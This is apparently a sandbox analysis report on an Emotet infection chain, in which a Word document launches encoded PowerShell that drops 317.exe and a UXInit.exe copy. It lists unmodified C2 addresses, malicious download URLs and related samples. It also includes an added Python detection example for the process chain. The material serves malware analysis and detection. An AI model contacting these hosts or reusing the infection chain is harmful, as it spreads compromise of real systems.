Source: C:\Users\user\317.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,
Source: C:\Users\user\317.exeCode function: GetLocaleInfoA,
Source: C:\Users\user\317.exeCode function: GetLocaleInfoA,
Source: C:\Users\user\317.exeCode function: _LcidFromHexString,GetLocaleInfoA,
Source: C:\Users\user\317.exeCode function: GetLocaleInfoA,_LcidFromHexString,_GetPrimaryLen,_strlen,
Source: C:\Users\user\317.exeCode function: _LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,
Source: C:\Users\user\317.exeCode function: _LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,
Contains functionality to query CPU information (cpuid)
Source: C:\Users\user\317.exeCode function: 3_2_00455551 cpuid
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Users\user\317.exeQueries volume information: C:\ VolumeInformation
Source: C:\Users\user\317.exeQueries volume information: C:\ VolumeInformation
Source: C:\Users\user\317.exeQueries volume information: C:\ VolumeInformation
Source: C:\Users\user\317.exeQueries volume information: C:\ VolumeInformation
Source: C:\Users\user\317.exeQueries volume information: C:\ VolumeInformation
Source: C:\Users\user\317.exeQueries volume information: C:\ VolumeInformation
Source: C:\Users\user\317.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\UXInit\UXInit.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\UXInit\UXInit.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\UXInit\UXInit.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\UXInit\UXInit.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\UXInit\UXInit.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\UXInit\UXInit.exeQueries volume information: C:\ VolumeInformation
Contains functionality to query local / system time
Source: C:\Users\user\317.exeCode function: 3_2_004475B7 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,
Contains functionality to query time zone information
Source: C:\Users\user\317.exeCode function: 3_2_0044F600 __lock,__invoke_watson,__invoke_watson,__invoke_watson,____lc_codepage_func,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,__invoke_watson,__invoke_watson,
Contains functionality to query windows version
Source: C:\Users\user\317.exeCode function: 3_2_0043C85E GetStartupInfoA,GetProcessHeap,GetProcessHeap,RtlAllocateHeap,_fast_error_exit,GetVersionExA,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,_fast_error_exit,_fast_error_exit,__RTC_Initialize,__ioinit,GetCommandLineA,___crtGetEnvironmentStringsA,__setargv,__setenvp,__cinit,__wincmdln,
Queries the cryptographic machine GUID
Source: C:\Users\user\317.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information:

Yara detected Emotet
Source: Yara matchFile source: 00000003.00000002.998731438.00211000.00000020.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000002.1382927198.00211000.00000020.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000003.00000002.995611411.00200000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000002.1382911202.00200000.00000040.00000001.sdmp, type: MEMORY

Remote Access Functionality:

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Source: C:\Users\user\317.exeCode function: 3_2_0040EE65 CreateBindCtx,CoTaskMemFree,
Source: C:\Users\user\317.exeCode function: 3_2_0040FFD4 __ehhandler$___std_fs_change_permissions@12,__EH_prolog3_GS,lstrlenW,__snprintf_s,CoTaskMemFree,CreateBindCtx,CoTaskMemFree,CoTaskMemFree,CoTaskMemFree,
Caveat: CreateBindCtx is the COM moniker bind-context API in ole32, not a socket bind, so the two functions above do not by themselves show a listening port. Treat this signature as name-based and confirm listening behaviour from the network and API traces rather than from this match.
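Added example, not from the report: detection logic for the process chain the signatures above describe (Office document, PowerShell with an encoded and very long command line, 317.exe dropped into the user profile root, a copy started from a self-named System32 subdirectory as UXInit.exe), run over a constructed set of Sysmon-style process-creation events. The report lists the parent of powershell.exe as unknown; the constructed events assume WINWORD.EXE, consistent with the VBA finding, and assume WmiPrvSE.exe as the parent of 317.exe because the decoded downloader launches it through Win32_Process.Create, which makes WmiPrvSE.exe rather than powershell.exe the recorded parent. The rule names, the command-line length threshold and the self-named-subdirectory heuristic are this example's own, and real Sysmon Event ID 1 records carry ParentImage directly, so the pid lookup is only there for logs that do not.

```python
import re
from pathlib import PureWindowsPath

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe"}
SCRIPT_HOSTS = {"powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
ENCODED_FLAG = re.compile(r"(?i)(?:^|\s)-(?:e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{16,}")
LONG_CMDLINE = 1024  # threshold chosen for this example

# Constructed Sysmon-style events mirroring the chain in the report. The WINWORD.EXE and
# WmiPrvSE.exe parent links are assumptions (see lead-in); Office14 is the Office 2010
# directory on the analysis system. The base64 argument is a placeholder, not the real blob.
SAMPLE_EVENTS = [
    {"pid": 1000, "ppid": 1, "image": r"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE",
     "cmdline": r'"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n C:\Users\user\Desktop\form.doc'},
    {"pid": 1100, "ppid": 1000, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powersheLL -e " + "JABhAA" * 300},
    {"pid": 1200, "ppid": 700, "image": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "cmdline": r"C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding"},
    {"pid": 1300, "ppid": 1200, "image": r"C:\Users\user\317.exe", "cmdline": r"C:\Users\user\317.exe"},
    {"pid": 1400, "ppid": 1300, "image": r"C:\Windows\System32\UXInit\UXInit.exe",
     "cmdline": r"C:\Windows\system32\UXInit\UXInit.exe"},
    # benign control events that must not fire
    {"pid": 1500, "ppid": 1, "image": r"C:\Windows\explorer.exe", "cmdline": "explorer.exe"},
    {"pid": 1600, "ppid": 1500, "image": r"C:\Windows\System32\notepad.exe", "cmdline": "notepad.exe"},
]


def _name(path):
    return PureWindowsPath(path).name.lower()


def _in_profile_root(path):
    """True for C:\\Users\\<user>\\<file>.exe, i.e. an executable sitting directly in a profile."""
    p = PureWindowsPath(path)
    parts = [x.lower() for x in p.parts]
    return len(parts) == 4 and parts[1] == "users" and p.suffix.lower() == ".exe"


def _system32_self_named_subdir(path):
    """True for C:\\Windows\\System32\\<dir>\\<dir>.exe; wbem\\WmiPrvSE.exe does not match."""
    p = PureWindowsPath(path)
    parts = [x.lower() for x in p.parts]
    return (len(parts) == 5 and parts[1:3] == ["windows", "system32"]
            and p.suffix.lower() == ".exe" and parts[3] == p.stem.lower())


def evaluate(events):
    """Return (pid, rule) pairs for every event that matches one of the chain rules."""
    by_pid = {e["pid"]: e for e in events}
    findings = []
    for e in events:
        parent = by_pid.get(e["ppid"])
        pname = _name(parent["image"]) if parent else None
        name = _name(e["image"])
        if pname in OFFICE_APPS and name in SCRIPT_HOSTS:
            findings.append((e["pid"], "office_spawns_script_host"))
        if name == "powershell.exe" and ENCODED_FLAG.search(e["cmdline"]):
            findings.append((e["pid"], "powershell_encoded_command"))
        if len(e["cmdline"]) > LONG_CMDLINE:
            findings.append((e["pid"], "very_long_cmdline"))
        # Win32_Process.Create hides the real parent; WmiPrvSE.exe starting a profile-root
        # executable is the observable left behind.
        if pname == "wmiprvse.exe" and _in_profile_root(e["image"]):
            findings.append((e["pid"], "wmi_launched_profile_root_exe"))
        if parent and _in_profile_root(parent["image"]) and _system32_self_named_subdir(e["image"]):
            findings.append((e["pid"], "profile_exe_spawns_system32_copy"))
    return findings


if __name__ == "__main__":
    for pid, rule in evaluate(SAMPLE_EVENTS):
        print(pid, rule)
```

The WmiPrvSE.exe rule is the one worth keeping even if the others are tuned away: an Office-to-PowerShell rule can be evaded by changing the launcher, but a loader that uses WMI to break the parent chain still leaves WmiPrvSE.exe as the parent of a file that was just written into the profile directory.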

Malware Configuration

Threatname: Emotet

{"C2 list": ["04.236.28.47:8080", "104.236.28.47/ch6aFjXP", "104.236.28.47:8080", "98.239.119.52/VgwZzucbO28XwD"]}

Behavior Graph

(Behavior graph not reproduced in this text export. Legend entries: Process, Signature, Created File, DNS/IP Info, Is Dropped, Is Windows Process, Number of created Registry Values, Number of created Files, Visual Basic, Delphi, Java, .Net C# or VB.NET, C, C++ or other language, Is malicious, Internet.)

Simulations

Behavior and APIs

Time     | Type            | Description
20:13:28 | API Interceptor | 46x Sleep call for process: powershell.exe modified
20:13:36 | API Interceptor | 32x Sleep call for process: 317.exe modified
20:13:47 | API Interceptor | 1680x Sleep call for process: UXInit.exe modified

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source   | Detection | Scanner                                    | Label
form.doc | 63%       | Virustotal                                 |
form.doc | 55%       | ReversingLabs TitaniumCloud FileReputation | Document-Word.Trojan.Snh
form.doc | 100%      | Avira                                      | VBA/Dldr.Agent.erhlk
form.doc | 100%      | Joe Sandbox ML                             |

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

Source                         | Detection | Scanner
teeo.highoninfo.com            | 1%        | Virustotal
thebluebearyhillproject.com    | 10%       | Virustotal
waws-prod-sn1-081.cloudapp.net | 0%        | Virustotal
sportnal.azurewebsites.net     | 4%        | Virustotal

URLs

Source | Detection | Scanner | Label
http://sportnal.azurewebsites.net/calendar/Xzoo/ | 11% | Virustotal |
http://sportnal.azurewebsites.net/calendar/Xzoo/ | 0% | Avira URL Cloud | safe
http://thebluebearyhillproject.com/wp-admin/q07/ | 17% | Virustotal |
http://thebluebearyhillproject.com/wp-admin/q07/ | 100% | Avira URL Cloud | malware
http://98.239.119.52/VgwZzucbO28XwD/OLIsQLqeqyzclLWVv/dDqe/wmOuSU/6FaQefiFlRcfZlz/ | 0% | Avira URL Cloud | safe
http://teeo.highoninfo.com/wp-admin/1tx/ | 10% | Virustotal |
http://teeo.highoninfo.com/wp-admin/1tx/ | 0% | Avira URL Cloud | safe

Yara Overview

Initial Sample

No yara matches

PCAP (Network Traffic)

No yara matches

Dropped Files

No yara matches

Memory Dumps

Source | Rule | Description | Author
00000003.00000002.998731438.00211000.00000020.00000001.sdmp | JoeSecurity_Emotet | Yara detected Emotet | Joe Security
00000004.00000002.1382927198.00211000.00000020.00000001.sdmp | JoeSecurity_Emotet | Yara detected Emotet | Joe Security
00000003.00000002.995611411.00200000.00000040.00000001.sdmp | JoeSecurity_Emotet | Yara detected Emotet | Joe Security
00000004.00000002.1382911202.00200000.00000040.00000001.sdmp | JoeSecurity_Emotet | Yara detected Emotet | Joe Security

Unpacked PEs

No yara matches

Sigma Overview

No Sigma rule has matched

Joe Sandbox View / Context

IPs

Match | Associated Sample Name / URL | Detection | Context
98.239.119.52 | http://smarktestllc.com/smarktestllc.com/95904/h19377590014459994sm8a4ndcimtsef | malicious | 98.239.119.52/4bV9XHDISanGEAB3XJ/
13.85.72.129 | http://mail.daw.lk/rainloop/docs/abzbl9903668066esolq17vvf/ | malicious | sportnal.azurewebsites.net/calendar/Xzoo/
13.85.72.129 | http://sparkplug.staging.rayportugal.com/wp-content/uploads/payment/7f04uyc9/g8l1900331414561161nv7pxvlyywrhgxf3k7/ | malicious | sportnal.azurewebsites.net/calendar/Xzoo/
13.85.72.129 | http://sparkplug.staging.rayportugal.com/wp-content/uploads/payment/7f04uyc9/g8l1900331414561161nv7pxvlyywrhgxf3k7/ | malicious | sportnal.azurewebsites.net/calendar/Xzoo/
13.85.72.129 | http://ssextintores.com.br/__old/wp-admin/css/colors/midnight/statement/dhxuoo5u/ | malicious | sportnal.azurewebsites.net/calendar/Xzoo/
104.236.28.47 | FMANe21F1Afxd4jr1iZv.exe | malicious | 104.236.28.47:8080/hsEe/YICxVEoN3pMBsmB/Bbf0AkvejSx/8qsGhyEfBUjgg/Gpdqq9a3ABnTAN/
104.236.28.47 | https://printmygame.com/wp-content/MV2VSF1FH61/eyeuxn/ | malicious | 104.236.28.47:8080/yohRBUJ/UJNjfPq7mCx/GIB4nD/4ymPh/
104.236.28.47 | 5167-31632_County_Report.rtf | malicious | 104.236.28.47:8080/qTOCLk7eJB0N7wSkI/airGiD5hVE0vdcJ/
104.236.28.47 | http://sepi.org.br/admin/assets/uploads/parts_service/61ywox9d8/ | malicious | 104.236.28.47:8080/z97ZWdfizXfGwwe/Cx9BA/
104.236.28.47 | http://www.wireup.in/oeiwosk36j3ss/INC/79wn96/xlhdd049999796-5498-mpnvitjpw5jhd/ | malicious | 104.236.28.47:8080/bKi1vowZfe5zkey0tB
104.236.28.47 | https://solisci.pl/static/8155709634/hckcl9086181-05369353-brlxdyqgid7day/ | malicious | 104.236.28.47:8080/G3kDfXyawUZt4wcjZoF
104.236.28.47 | https://triani.in/wp-admin/report/q4lk2j41/ | malicious | 104.236.28.47:8080/Z2OpCse

Domains

Match | Associated Sample Name / URL | Detection | Context
teeo.highoninfo.com | http://mail.daw.lk/rainloop/docs/abzbl9903668066esolq17vvf/ | malicious | 104.31.69.30
teeo.highoninfo.com | http://sparkplug.staging.rayportugal.com/wp-content/uploads/payment/7f04uyc9/g8l1900331414561161nv7pxvlyywrhgxf3k7/ | malicious | 104.31.68.30
teeo.highoninfo.com | http://sparkplug.staging.rayportugal.com/wp-content/uploads/payment/7f04uyc9/g8l1900331414561161nv7pxvlyywrhgxf3k7/ | malicious | 104.31.68.30
teeo.highoninfo.com | http://ssextintores.com.br/__old/wp-admin/css/colors/midnight/statement/dhxuoo5u/ | malicious | 104.31.68.30
thebluebearyhillproject.com | http://mail.daw.lk/rainloop/docs/abzbl9903668066esolq17vvf/ | malicious | 205.144.171.44
waws-prod-sn1-081.cloudapp.net | http://mail.daw.lk/rainloop/docs/abzbl9903668066esolq17vvf/ | malicious | 13.85.72.129
waws-prod-sn1-081.cloudapp.net | http://sparkplug.staging.rayportugal.com/wp-content/uploads/payment/7f04uyc9/g8l1900331414561161nv7pxvlyywrhgxf3k7/ | malicious | 13.85.72.129
waws-prod-sn1-081.cloudapp.net | http://sparkplug.staging.rayportugal.com/wp-content/uploads/payment/7f04uyc9/g8l1900331414561161nv7pxvlyywrhgxf3k7/ | malicious | 13.85.72.129
waws-prod-sn1-081.cloudapp.net | http://ssextintores.com.br/__old/wp-admin/css/colors/midnight/statement/dhxuoo5u/ | malicious | 13.85.72.129

ASN

Match | Associated Sample Name / URL | Detection | Context
unknown | Where are the female CEOs.docx | malicious | 178.63.12.147
unknown | updated W-9.doc | malicious | 162.241.95.113
unknown | Purchase Orders 206584, 206585 and 206586.exe | malicious | 35.198.186.120
unknown | https://storage.googleapis.com/jjo00/dre.htm | malicious | 162.241.65.229
unknown | passware kit forensic 2020.1_63859.exe | malicious | 104.18.45.18
unknown | passware kit forensic 2020.1_63859.exe | malicious | 104.18.45.18
unknown | https://vatorr.com/?a=-1&oc=4271&c=15325&s1=Test | malicious | 52.209.241.224
unknown | https://jksfoodsandflavours.in/Kimberly/Stone | malicious | 199.79.62.144
unknown | Zc6IOC19MA.exe | malicious | 34.240.41.135
unknown | job_attach_n3s.js | malicious | 47.90.201.224
unknown | su boleta de citaci#U00f3n (N#U00ba 00946745 ).vbs | malicious | 186.147.55.19
unknown | JVC_56453.vbs | malicious | 216.10.243.36
unknown | run | malicious | 45.9.148.99
unknown | http://olo00-pop0op0o.appspot.com#elizabeth.brown@grace.com | malicious | 172.217.23.244
unknown | 9D4RPxqg4p | malicious | 216.58.201.99
unknown | Shipping_Document.html | malicious | 177.11.49.50
unknown | DOC130219-77625.htm | malicious | 185.176.222.12
unknown | Purchase Orders 206584, 206585 and 206586.exe | malicious | 172.217.23.193
unknown | http://robotrade.com.vn/wp-content/images/views/qaxCr0UKyI0yfkE.exe | malicious | 103.74.123.3
unknown | http://t.mid.accor-mail.com/r/?id=h183a082d,cb39eee,f935f6d&p1=wefewfgwe5.azurewebsites.net/%25D9%2585%25D8%25B3%25D8%25A7%25D8%25A1%25D8%25A7%25D9%2584%25D8%25AE%25D9%258A%25D8%25B158mento-nadja.paulus%25D9%2585%25D8%25B3%25D8%25A7%25D8%25A1%25D8%25A7%25D9%2584%25D8%25AE%25D9%258A%25D8%25B1%26p2%3Dal-1%26p3%3Dal-mento%26p4%3Dal-mento%26p5%3D73ebc323e52870ddbc9af4d0b9f33a235879a03de828bf14009ed99f874dac48%2523nadja.paulus%40zehndergroup.com | malicious | 52.173.77.140

JA3 Fingerprints

No context

Dropped Files

No context

Screenshots

Thumbnails

(Screenshot thumbnails not reproduced in this text export.)